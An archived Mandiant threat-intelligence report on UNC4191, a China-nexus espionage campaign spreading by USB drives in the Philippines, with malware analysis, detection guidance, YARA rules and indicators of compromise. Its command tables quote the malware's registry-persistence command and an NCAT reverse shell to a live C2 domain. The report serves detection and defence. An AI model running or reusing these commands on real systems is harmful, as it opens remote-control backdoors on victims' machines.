{ "id": "e77457b9-7317-4de2-bc99-497586096d5c", "created_at": "2026-04-06T00:12:51.051444Z", "updated_at": "2026-04-10T03:36:48.398639Z", "deleted_at": null, "sha1_hash": "8042d71d911648f3b2811e731f99c1f3f0901db9", "title": "Always Another Secret: Lifting the Haze on China-nexus Espionage in Southeast Asia | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1003451, "plain_text": "Always Another Secret: Lifting the Haze on China-nexus\r\nEspionage in Southeast Asia | Mandiant\r\nBy Mandiant\r\nPublished: 2022-11-28 · Archived: 2026-04-05 18:16:11 UTC\r\nWritten by: Ryan Tomcik, John Wolfram, Tommy Dacanay, Geoff Ackerman\r\nMandiant Managed Defense recently identified cyber espionage activity that heavily leverages USB devices as an\r\ninitial infection vector and concentrates on the Philippines. Mandiant tracks this activity as UNC4191 and we\r\nassess it has a China nexus.\r\nUNC4191 operations have affected a range of public and private sector entities primarily in Southeast Asia and\r\nextending to the U.S., Europe, and APJ; however, even when targeted organizations were based in other locations,\r\nthe specific systems targeted by UNC4191 were also found to be physically located in the Philippines.\r\nFollowing initial infection via USB devices, the threat actor leveraged legitimately signed binaries to side-load\r\nmalware, including three new families we refer to as MISTCLOAK, DARKDEW, and BLUEHAZE. Successful\r\ncompromise led to the deployment of a renamed NCAT binary and execution of a reverse shell on the victim’s\r\nsystem, providing backdoor access to the threat actor. The malware self-replicates by infecting new removable\r\ndrives that are plugged into a compromised system, allowing the malicious payloads to propagate to additional\r\nsystems and potentially collect data from air-gapped systems.\r\nMandiant Managed Defense performs continuous threat hunting for customers, discovering evidence of new\r\ntactics, techniques, and procedures (TTPs) that can evade traditional detection mechanisms\r\nIn response to this campaign, Mandiant deployed new real-time detections, enhancing Managed Defense’s\r\nprotection for our customers from future similar activity. Our Adversary Operations team created and deployed\r\nYARA rules and Mandiant Security Validation Actions, shared at the end of the post. This blog post details our\r\ninitial threat hunting discovery, the newly identified malware families, detection opportunities, and Mandiant’s\r\nassessment about the goals and motivations of the threat actor.\r\nMalware Observed\r\nMandiant observed UNC4191 deploy the following malware families.\r\nMalware\r\nFamily\r\nDescription\r\nMISTCLOAK\r\nMISTCLOAK is a launcher written in C++ that executes an encrypted executable payload\r\nstored in a file on disk.\r\nhttps://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia\r\nPage 1 of 13\n\nBLUEHAZE\r\nBLUEHAZE is a launcher written in C/C++ that launches a copy of NCAT to create a\r\nreverse shell to a hardcoded command and control (C2).\r\nDARKDEW DARKDEW is a dropper written in C++ that is capable of infecting removable drives.\r\nNCAT\r\nNCAT is a command-line networking utility that was written for the Nmap Project to\r\nperform a wide-variety of security and administration tasks. While NCAT may be used for\r\nlegitimate purposes, threat actors may also use it to upload or download files, create\r\nbackdoors or reverse shells, and tunnel traffic to evade network controls.\r\nTable 1: UNC4191 Malware Families\r\nInitial Detection\r\nMandiant Managed Defense customers receive Mandiant’s dedicated proactive Threat Hunting service. Mandiant's\r\nthreat hunting team leverages the MITRE ATT\u0026CK® framework as a guide for developing Hunt Missions that\r\nexamine endpoint telemetry data, such as process events, for collection and ATT\u0026CK technique ID tagging. The\r\nresulting threat hunting data set provides the team with wide visibility across the customer base. When performing\r\nanalysis, we augment this data set with more targeted sources, like custom, real-time alerting from our customers’\r\nendpoint detection and response (EDR) technologies.\r\nMandiant uses custom tooling to identify ATT\u0026CK technique sequences and clusters associated with common\r\nthreat actor behaviors. A technique sequence is useful for identifying events with a defined order of execution,\r\nsuch as the creation of a local account (T1136.001) and then addition to the local Administrators group (T1098). A\r\ntechnique cluster identifies a grouping of techniques that don’t necessarily occur in a specific order. By focusing\r\non technique sequences and clusters, we reduce the amount of data that needs to be manually reviewed by\r\nanalysts.\r\nFor example, Mandiant has observed threat actors enumerating domain trusts (T1482) and querying domain and\r\nlocal group permissions (T1069.001, T1069.002) within a several minute span (Figure 1). The combined event\r\ncount for these three techniques occurring on their own can number in the hundreds of thousands, but by applying\r\ntechnique sequencing or clustering we can reduce the number of interesting events to a manageable amount.\r\nhttps://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia\r\nPage 2 of 13\n\nFigure 1: Visualization of technique sequencing and clustering concepts\r\nMandiant identified this UNC4191 campaign by searching for anomalous sequences of events under our\r\n“Mandiant Intelligence: Staging Directories” and “Command and Scripting Interpreter: Windows Command Shell\r\n(T1059.003)” hunting missions (Figure 2).\r\nhttps://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia\r\nPage 3 of 13\n\nFigure 2: Technique sequence that led to UNC4191 detection\r\nThe techniques performed by UNC4191 led to the development of additional technique sequences and detection\r\nopportunities, as described in the Detection Opportunities section.\r\nUNC4191 Malware Infection Cycle\r\nThe overall infection cycle from this campaign can be split into three distinct phases, shown in Figure 3.\r\nFigure 3: UNC4191 malware infection cycle\r\nhttps://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia\r\nPage 4 of 13\n\nPHASE I: MISTCLOAK\r\nThe infection chain begins when a user plugs in a compromised removable device and manually executes a\r\nrenamed signed binary from the root directory of the storage volume (T1091). The initial binaries—named\r\nRemovable Drive.exe or USB Drive.exe—are versions of a legitimately signed application called USB Network\r\nGate, developed by the company Electronic Team, Inc. These are used to side-load the MISTCLOAK malware\r\nthat impersonates a legitimate DLL (Table 2).\r\nMD5: f45726a9508376fdd335004fca65392a\r\nFile Name(s): D:\\Removable Disk.exe, D:\\USB Drive.exe\r\nSignature Subject: Electronic Team, Inc\r\nProduct Name: USB Network Gate\r\nOriginal File Name: UsbConfig.exe\r\nMD5: 707de51327f6cae5679dee8e4e2202ba\r\nFile Name(s): D:\\Removable Disk.exe, D:\\USB Drive.exe\r\nSignature Subject: Electronic Team, Inc\r\nProduct Name: USB Network Gate\r\nOriginal File Name: UsbConfig.exe\r\nTable 2: Legitimate USB Network Gate binaries used to side-load MISTCLOAK malware\r\nThe renamed USB Network Gate binaries load a MISTCLOAK DLL named u2ec.dll from the execution directory\r\non the removable device (T1574.002) (Table 3). MISTCLOAK is a launcher for the encrypted file usb.ini, which\r\nMISTCLOAK reads from the current directory or the path autorun.inf\\Protection for Autorun\\System Volume\r\nInformation\\usb.ini. Mandiant identified the PDB file path G:\\project\\APT\\U盘劫持\r\n\\new\\shellcode\\Release\\shellcode.pdb in the MISTCLOAK sample. Notably, the Chinese characters 盘劫持\r\ntranslate to “disk hijacking”.\r\nMD5: 7753da1d7466f251b60673841a97ac5a\r\nFile Name: u2ec.dll\r\nCompile Time: 2021-09-01T09:23:30Z\r\nExports: u2ec.dll\r\nSize: 82,944\r\nPDB filename: G:\\project\\APT\\U盘劫持\\new\\u2ec\\Release\\u2ec.pdb (G:\\project\\APT\\U Disk Hijacking\\new\\u2ec\\Release\r\nTable 3: MISTCLOAK malware metadata\r\nMISTCLOAK then opens Windows Explorer to the location on the removable device where the user files are\r\nstored with the command ‘explorer.exe  \"\u003cdrive\u003e:\\autorun.inf\\Protection for Autorun\"’.\r\nPhase II: DARKDEW\r\nThe file usb.ini contains an encrypted DLL payload called DARKDEW that is capable of infecting removable\r\ndrives. If executed from a removable drive, DARKDEW will launch explorer.exe via `explorer.exe\r\nhttps://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia\r\nPage 5 of 13\n\n“\u003cdrive\u003e:\\autorun.inf\\Protection for Autorun”` where \u003cdrive\u003e is a removable drive letter, such as “E”.\r\nDARKDEW will then check if either C:\\ProgramData\\udisk\\disk_watch.exe or  \r\nC:\\ProgramData\\udisk\\DateCheck.exe exist and will create the directory C:\\ProgramData\\udisk if neither are\r\nfound.\r\nMD5: 6900cf5937287a7ae87d90a4b4b4dec5\r\nFile Name: N/A\r\nCompile Time: 2021-09-09T08:45:31Z\r\nExports: N/A\r\nSize: 123,904\r\nPDB filename: G:\\project\\APT\\U盘劫持\\new\\shellcode\\Release\\shellcode.pdb\r\nTable 4: DARKDEW malware metadata\r\nDARKDEW then proceeds to copy every file from \u003cdrive\u003e:\\autorun.inf\\Protection for Autorun\\System Volume\r\nInformation\\ to C:\\ProgramData\\udisk\\. Mandiant identified files in this directory, such as Removable Drive\r\n(16GB).lnk, that originated from a system that was previously compromised by DARKDEW (T1074.001) and\r\ncopied to a USB device. The copied data includes the files shown in Table 5 and arbitrary files with the\r\nextensions: xlsx, docx, mp4, device, jpg, pptx, pdf, txt, and lnk files.\r\nC:\\ProgramData\\udisk\\disk_watch.exe\r\nC:\\ProgramData\\udisk\\libeay32.dll\r\nC:\\ProgramData\\udisk\\Removable Disk.exe\r\nC:\\ProgramData\\udisk\\rzlog4cpp.dll\r\nC:\\ProgramData\\udisk\\rzlog4cpp_logger.dll\r\nC:\\ProgramData\\udisk\\ssleay32.dll\r\nC:\\ProgramData\\udisk\\u2ec.dll\r\nC:\\ProgramData\\udisk\\USB Drive.exe\r\nC:\\ProgramData\\udisk\\usb.ini\r\nC:\\ProgramData\\udisk\\UsbConfig.exe\r\nC:\\ProgramData\\udisk\\wuwebv.exe\r\nC:\\ProgramData\\udisk\\DateCheck.exe\r\nC:\\ProgramData\\udisk\\example.jpg\r\nC:\\ProgramData\\udisk\\example.xlsx\r\nTable 5: Files that are copied by DARKDEW from the removable drive to a compromised system\r\nDARKDEW will then copy the renamed USB Network Gate binary (e.g., Removable Drive.exe) to\r\nC:\\ProgramData\\udisk\\disk_watch.exe and create persistence with a registry key value named udisk under\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run (T1547.001). Finally, DARKDEW will launch a file\r\nnamed C:\\ProgramData\\udisk\\DateCheck.exe and then exit.\r\nKey: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nValue: udisk\r\nhttps://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia\r\nPage 6 of 13\n\nText: c:\\programdata\\udisk\\disk_watch.exe\r\nTable 6: DARKDEW registry persistence\r\nIf DARKDEW is executed from a non-removable drive, the behavior is slightly different. DARKDEW will create\r\nthe directory C:\\ProgramData\\udisk\\, then copy every file in the current directory of the parent executable to\r\nC:\\ProgramData\\udisk\\. It will then copy the parent executable to C:\\ProgramData\\udisk\\disk_watch.exe and\r\nlaunch it. The persistence mechanism is identical, and it will also launch C:\\ProgramData\\udisk\\DateCheck.exe.\r\nWhen DARKDEW is executed within the context of disk_watch.exe, the malware will scan the system every 10\r\nseconds for removable drives by enumerating volumes from A to Z until it finds one that is removable. The\r\nDARKDEW malware then creates the directory \u003cdrive\u003e\\autorun.inf\\Protection for Autorun\\, sets its attribute to\r\nhidden, and copies the contents of the current working directory of disk_watch.exe to that directory or the\r\nsubdirectory \u003cdrive\u003e:\\autorun.inf\\Protection for Autorun\\System Volume Information\\. This capability appears to\r\nbe a method for self-replication and to transfer files that may be collected from air-gapped systems. \r\nPhase III: BLUEHAZE\r\nThe binary DateCheck.exe is a renamed version of a legitimate, signed application called Razer Chromium\r\nRender Process by Razer USA Ltd. (Table 7).\r\nMD5: ea7f5b7fdb1e637e4e73f6bf43dcf090\r\nFile Name(s): DateCheck.exe\r\nSignature Subject: Razer USA Ltd.\r\nProduct Name: Razer Chromium Render Process\r\nOriginal File Name: RzCefRenderProcess.exe\r\nTable 7: Legitimate Razer USA Ltd. binary used to side-load BLUEHAZE malware\r\nThe renamed Razor application, DateCheck.exe, loads the legitimate file rzlog4cpp_logger.dll, which calls the\r\ngetRoot function from the BLUEHAZE malware RzLog4CPP.dll during C runtime startup (T1574.002).\r\nMD5: f632e4b9d663d69edaa8224a43b59033\r\nFile Name: RzLog4CPP.dll\r\nCompile Time: 2021-09-09T09:27:12Z\r\nExports: log4cpp.dll\r\nSize: 201,216\r\nPDB filename: N/A\r\nTable 8: BLUEHAZE malware metadata\r\nBLUEHAZE will create a new directory called C:\\Users\\Public\\Libraries\\CNNUDTV\\, then it will create the\r\nregistry key value ACNTV under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run (T1547.001) for\r\npersistence. Next, BLUEHAZE copies all the files from its working directory to\r\nC:\\Users\\Public\\Libraries\\CNNUDTV\\ and then executes a renamed NCAT executable wuwebv.exe to create a\r\nhttps://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia\r\nPage 7 of 13\n\nreverse shell to the hard-coded command and control (C2) address: closed[.]theworkpc[.]com:80 (T1059).\r\nMandiant has not observed evidence of reverse shell interaction; however, based on the age of the activity, this\r\nmay be a result of visibility gaps or short log retention periods.\r\nDateCheck.exe \u003e\r\n\"cmd.exe /C reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v ACNTV /t REG_SZ /d \\\"Rundll32.exe\r\ncmd.exe /c copy *.* C:\\\\Users\\\\Public\\\\Libraries\\\\CNNUDTV\\\\\"\r\ncmd.exe /C wuwebv.exe -t -e c:\\\\windows\\\\system32\\\\cmd.exe closed.theworkpc[.]com 80\r\nTable 9: BLUEHAZE command execution\r\nOutlook and Implications\r\nBased on available data, such as PE compile timestamps for the malware involved in the aforementioned activity,\r\nthis campaign potentially extends back to September 2021. Given the worming nature of the malware involved,\r\nwe may have detected the later stages of this malware’s proliferation.\r\nWe believe this activity showcases Chinese operations to gain and maintain access to public and private entities\r\nfor the purposes of intelligence collection related to China’s political and commercial interests. Our observations\r\nsuggest that entities in the Philippines are the main target of this operation based on the number of affected\r\nsystems located in this country that were identified by Mandiant.\r\nCampaign Tracking\r\nMandiant will continue to monitor UNC4191’s campaign and will provide notable and dynamic updates regarding\r\nchanges in tactics and techniques, the introduction of tools with new capabilities, or the use of new infrastructure\r\nto carry out their mission.\r\nFor more insights into how Mandiant tracks this and similar campaigns, see our Threat Campaigns feature within\r\nMandiant Advantage Threat Intelligence.\r\nDetection Opportunities\r\nEach Mandiant threat hunting discovery is evaluated for opportunities to create new real-time detections. These\r\ndetections help Mandiant identify additional activity across our customers’ environments for rapid escalation and\r\ntriage analysis and aim to reduce threat actor dwell time.\r\nFollowing our initial campaign discovery, we immediately searched the entire Managed Defense customer base\r\nfor any activity that matched our atomic indicators of interest, including filenames, file paths, file hashes, IP\r\naddresses, domains, and other artifacts. This uncovered activity on systems at multiple customers.\r\nhttps://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia\r\nPage 8 of 13\n\nAdditionally, we also created or updated real-time Managed Defense detections to identify threat actor\r\nmethodologies, such as:\r\nDeployment or usage of NETCAT and NCAT reverse shells\r\nModification of registry Run keys for malware persistence, with arguments configured to execute the\r\nWindows binary rundll32.exe\r\nProcesses launched from the C:\\Users\\Public\\Libraries\\ directory\r\nBy combining Mandiant’s threat intelligence service with Managed Defense’s detection engineering and threat\r\nhunting capabilities, we can rapidly identify and provide context around malicious activity.\r\nDetection\r\nOpportunity \r\nMITRE\r\nATT\u0026CK \r\nEvent Details \r\nNCAT reverse shell\r\nexecution arguments \r\nT1059 \r\nwuwebv.exe -t -e c:\\\\windows\\\\system32\\\\cmd.exe\r\nclosed.theworkpc[.]com 80 \r\nParent or grandparent\r\nprocesses executing\r\nfrom Non-C:\\ Drive\r\nRoot \r\nT1091,\r\nT1036 \r\nProcess: \r\nD:\\USB Drive.exe \r\nChild Processes: \r\n\u003e explorer.exe  \"D:\\autorun.inf\\Protection for Autorun\" \r\n\u003e c:\\programdata\\udisk\\disk_watch.exe \r\n\u003e c:\\programdata\\udisk\\DateCheck.exe \r\nGrandchild Processes: \r\n\u003e\u003e \"cmd.exe /C reg add\r\nHKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v\r\nACNTV /t REG_SZ /d \\\"Rundll32.exe\r\nSHELL32.DLL,ShellExec_RunDLL\r\n\\\"C:\\\\Users\\\\Public\\\\Libraries\\\\CNNUDTV\\\\DateCheck.exe\\\"\\\" /f\" \r\n\u003e\u003e cmd.exe /c copy *.* C:\\\\Users\\\\Public\\\\Libraries\\\\CNNUDTV\\\\\" \r\n\u003e\u003e cmd.exe /C wuwebv.exe -t -e c:\\\\windows\\\\system32\\\\cmd.exe\r\nclosed.theworkpc[.]com 80 \r\nRegistry Run key\r\npersistence for binary\r\nin\r\nPROGRAMDATA \r\nT1060 \r\nRegistry Key:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run  \r\nValue: udisk  \r\nhttps://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia\r\nPage 9 of 13\n\nText: c:\\programdata\\udisk\\disk_watch.exe \r\nRegistry Run key\r\nexecuting RunDLL32\r\ncommand \r\nT1218.011,\r\nT1060 \r\nreg add\r\nHKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v\r\nACNTV /t REG_SZ /d \\\"Rundll32.exe\r\nSHELL32.DLL,ShellExec_RunDLL\r\n\\\"C:\\\\Users\\\\Public\\\\Libraries\\\\CNNUDTV\\\\DateCheck.exe\\\"\\\" /f\" \r\nFile name of\r\nexecuting process\r\ndoesn’t match\r\noriginal name \r\nT1036,\r\nT1574.002 \r\nOriginalFileName: UsbConfig.exe \r\nFile Name: Removable Disk.exe, USB Drive.exe \r\nOriginalFileName: RzCefRenderProcess.exe \r\nFile Name: DateCheck.exe \r\nWindows Explorer\r\nprocess execution\r\nwith folder path\r\nspecified on\r\ncommand line \r\nT1091 \r\nParent Process Path: D:\\USB Drive.exe \r\nProcess: explorer.exe \r\nCommand Line: explorer.exe  \"D:\\autorun.inf\\Protection for\r\nAutorun\" \r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID  Name \r\n A105-454  Protected Theater - UNC4191, BLUEHAZE, Execution, Variant #1 \r\n A105-455  Protected Theater - UNC4191, DARKDEW, Execution, Variant #1 \r\n A105-466  Command and Control - UNC4191, DNS Query, Variant #1 \r\nYARA Rules\r\nMISTCLOAK\r\nrule M_Hunting_Launcher_MISTCLOAK_1 {\r\n meta:\r\n author = \"Mandiant\"\r\nhttps://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia\r\nPage 10 of 13\n\nstrings:\r\n $s1 = \"CheckUsbService\" ascii\r\n $s2 = \"new\\\\u2ec\\\\Release\\\\u2ec.pdb\" ascii\r\n $s3 = \"autorun.inf\\\\Protection for Autorun\" ascii\r\n condition:\r\n uint16(0) == 0x5a4d and\r\n filesize \u003c 200KB and\r\n (2 of ($s*))\r\n}\r\nDARKDEW\r\nrule M_Hunting_Dropper_DARKDEW_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n strings:\r\n $s1 = \"do inroot\" ascii\r\n $s2 = \"disk_watch\" ascii\r\n $s5 = \"G:\\\\project\\\\APT\\\\\" ascii\r\n $s3 = \"c:\\\\programdata\\\\udisk\" ascii\r\n $s4 = \"new\\\\shellcode\\\\Release\\\\shellcode.pdb\" ascii\r\n condition:\r\n filesize \u003c 500KB and\r\n (2 of ($s*))\r\n}\r\nBLUEHAZE\r\nrule M_Hunting_Launcher_BLUEHAZE_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n strings:\r\n $s1 = \"Libraries\\\\CNNUDTV\" ascii\r\n $s2 = \"closed.theworkpc.com\" ascii\r\n $s3 = \"cmd.exe /C wuwebv.exe -t -e\" ascii\r\n condition:\r\n uint16(0) == 0x5a4d and\r\n filesize \u003c 500KB and\r\nhttps://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia\r\nPage 11 of 13\n\n(2 of ($s*))\r\n}\r\nIndicators of Compromise\r\nType  Value  Description \r\nDomain  closed.theworkpc[.]com  NCAT C2\r\nMD5  7753da1d7466f251b60673841a97ac5a  MISTCLOAK \r\nMD5  c10abb9f88f485d38e25bc5a0e757d1e  DARKDEW (usb.ini file) \r\nMD5  6900cf5937287a7ae87d90a4b4b4dec5  DARKDEW (decrypted payload) \r\nMD5  f632e4b9d663d69edaa8224a43b59033  BLUEHAZE \r\nMD5  8ec339a89ec786b2aea556bedee679c7  NCAT \r\nMD5  f45726a9508376fdd335004fca65392a \r\nUSB Network Gate (Legitimate Binary used for DLL\r\nSide-Loading) \r\nMD5  707de51327f6cae5679dee8e4e2202ba \r\nUSB Network Gate (Legitimate Binary used for DLL\r\nSide-Loading) \r\nMD5  ea7f5b7fdb1e637e4e73f6bf43dcf090 \r\nRazer Chromium Render Process (Legitimate Binary\r\nused for DLL Side-Loading) \r\nFile\r\nPath \r\nC:\\ProgramData\\udisk  File and Malware Staging \r\nhttps://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia\r\nPage 12 of 13\n\nFile\r\nPath \r\nC:\\Users\\Public\\Libraries\\CNNUDTV  File and Malware Staging \r\nAcknowledgements\r\nSpecial thanks to Tobias Krueger and Conor Quigley for their assistance with analyzing the MISTCLOAK,\r\nDARKDEW, and BLUEHAZE samples and Matthew Hoerger for creating Mandiant Security Validation (MSV)\r\nactions. We would also like to thank Tim Martin, Alexander Pennino, Nick Richard, and Sarah Hawley for their\r\ntechnical review and feedback.\r\nPosted in\r\nThreat Intelligence\r\nSource: https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia\r\nhttps://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "Malpedia" ], "references": [ "https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia" ], "report_names": [ "china-nexus-espionage-southeast-asia" ], "threat_actors": [ { "id": "d61cd7ed-6d16-491f-90a1-6323aae8f67f", "created_at": "2022-12-27T17:02:23.610663Z", "updated_at": "2026-04-10T02:00:04.9586Z", "deleted_at": null, "main_name": "UNC4191", "aliases": [], "source_name": "ETDA:UNC4191", "tools": [ "BLUEHAZE", "DARKDEW", "HIUPAN", "MISTCLOAK", "NCAT" ], "source_id": "ETDA", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "b0f6e3c5-5424-463a-ada3-532ca52e5940", "created_at": "2023-11-17T02:00:07.60381Z", "updated_at": "2026-04-10T02:00:03.45747Z", "deleted_at": null, "main_name": "UNC4191", "aliases": [], "source_name": "MISPGALAXY:UNC4191", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434371, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8042d71d911648f3b2811e731f99c1f3f0901db9.pdf", "text": "https://archive.orkl.eu/8042d71d911648f3b2811e731f99c1f3f0901db9.txt", "img": "https://archive.orkl.eu/8042d71d911648f3b2811e731f99c1f3f0901db9.jpg" } }